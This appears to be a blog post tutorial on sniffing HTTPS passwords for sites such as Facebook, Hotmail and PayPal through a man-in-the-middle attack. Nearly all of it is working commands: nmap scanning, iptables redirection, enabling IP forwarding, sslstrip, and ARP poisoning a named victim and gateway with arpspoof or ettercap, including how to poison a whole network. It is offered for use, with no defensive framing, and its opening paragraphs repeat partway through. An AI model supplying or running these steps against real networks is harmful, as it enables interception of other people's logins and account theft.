Sniff SSL | https password sniffing
Tool requirement:
sslstrip, ettercap, arpspoof already in backtrack .
Procedure
Ok well I'v seen a couple people complaining about not being able to sniff facebook, hotmail and paypal passwords. This is because these sites use an https connection. So before you can sniff these passwords in a mitm attack you need to strip the ssl. Ettercap does have an ssl stripping ability but we're going to use sslstrip because it's better.
First thing you need to get it backtrack 4 pre-final. Or you can use another linux distro, and add the tools yourself.
1. First we need to find out what your subnet and default gateway is. Open up a shell.
Code:
you will get something like this
Code:
Tool requirement:
sslstrip, ettercap, arpspoof already in backtrack .
Procedure
Ok well I'v seen a couple people complaining about not being able to sniff facebook, hotmail and paypal passwords. This is because these sites use an https connection. So before you can sniff these passwords in a mitm attack you need to strip the ssl. Ettercap does have an ssl stripping ability but we're going to use sslstrip because it's better.
First thing you need to get it backtrack 4 pre-final. Or you can use another linux distro, and add the tools yourself.
1. First we need to find out what your subnet and default gateway is. Open up a shell.
Code:
routeyou will get something like this
Code:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0
default 192.168.1.254 0.0.0.0 UG 0 0 0 wlan0
in my case 192.168.1.254 is the gateway. Therefore 192.168.1.1 is the subnet and we use that with nmap.
2. So now we use nmap to find other machines on the network.
Code:
nmap -sP 192.168.1.1/24 |grep "Host"
3. Now we need to enable ip tables in ettercap.Code:
nano /etc/etter.conf
scroll down untill you find these lines in the file
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Change them to this
Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"Hit Ctrl-X then y then enter
4. Now we create our iptables rule
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
5. Now we need to enable ip forwarding
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
6. Now we need to find the interface your using.
Code:
ifconfig
find the interface with your ip address listed underneath it. In my case it's wlan0.
7. Now start sslstrip
Code:
sslstrip -a -k -f
OPTION A: (better)
1. Open a new shell and start arpspoof
Code:
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.254
wlan0 is my interface
192.168.1.101 is my target ip
192.168.1.254 is my gateway
2. Finally, open up another shell and start ettercap in sniffer mode.Code:
ettercap -T -q -i wlan0
wlan0 being your interface
The sniffed passwords will come up in the ettercap window.
Last thing. Arpspoof will not re-arp the victims for you. So just start arp-spoofing with ettercap and shut it down right away.
Code:
ettercap -T -M arp:remote -i wlan0 /192.168.1.254/ /192.168.1.101/
interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101
then just hit "q" and ettercap will re-arp your victim. I usually already have this command typed and ready to go in a new shell so I can quickly fix the arp cache when I'm done.
OPTION B: (easier)
open up a new shell and start ettercap
Code:
ettercap -T -i wlan0 -q -M arp:remote /192.168.1.254/ /192.168.1.101/
interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101 (leave target blank "//" to poison entire network)
No comments:
Post a Comment